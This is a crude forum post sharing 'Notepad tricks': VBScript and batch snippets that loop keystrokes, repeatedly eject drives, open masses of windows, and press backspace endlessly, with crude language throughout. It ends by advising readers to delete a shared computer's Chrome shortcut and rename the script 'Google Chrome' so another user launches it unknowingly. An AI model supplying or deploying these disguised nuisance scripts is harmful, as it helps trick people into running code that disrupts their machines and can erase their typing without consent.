Notepad tricks to rape your computer ;)

cApSL0ckb0mb3r

Reaction score
If you're on a shared computer this will work better.
Someone in your house uses a program like--- Google chrome? Or any others.

This will auto type whatever you want it to. It will flood the shit out of everything.
WARNING, lol. Don't fucking open this. It's not a virus but it's fucking annoying.
Copy and paste this into notepad, name it anything with a .vbs on the end. Save it to your desktop.
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "WRITE YOUR TEXT HERE!!!!"
loop
_______________________________________________________________________________________________

This ejects everything, CD drives, USB's, USB Internet modems. And any other portable media.
If you unplug them and plug them back in, it automatically ejects again until you reboot.
Again, Copy and paste this into notepad and save it to anything with a .vbs on the end.
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
_______________________________________________________________________________________________

Flood the fuck out of your computer with as many command prompt / notepad windows as you wish.
Copy and paste this into notepad with a .bat on the end :D :D:D
The more "start notepad"'s you put in this script the more will open. I suggest copy about 10 of them and rape CTRL+V. Around 1000 will be fine P:
Code:
@echo off
start notepad
start notepad
start notepad

Make your keyboard press any key, non stop. I suggest backspace :D :D:D
Again with the .vbs file extension.
Code:
MsgBox “BACKSPACE”

Set wshShell =wscript.CreateObject(“WScript.Shell”)

do

wscript.sleep 100

wshshell.sendkeys “{bs}”

loop

That is all. Better to use it on a shared computer for more fun.
EG: If they use google chrome, delete the google chrome shortcut. Rename your notepad shit to "Google Chrome"
If they are shit they won't understand what the .vbs or the picture is and click on it anyway.
Sit back and watch the fun.

!! These are not actual viruses! They won't wreak your computer! They keep going and going until you log off / restart your computer! !!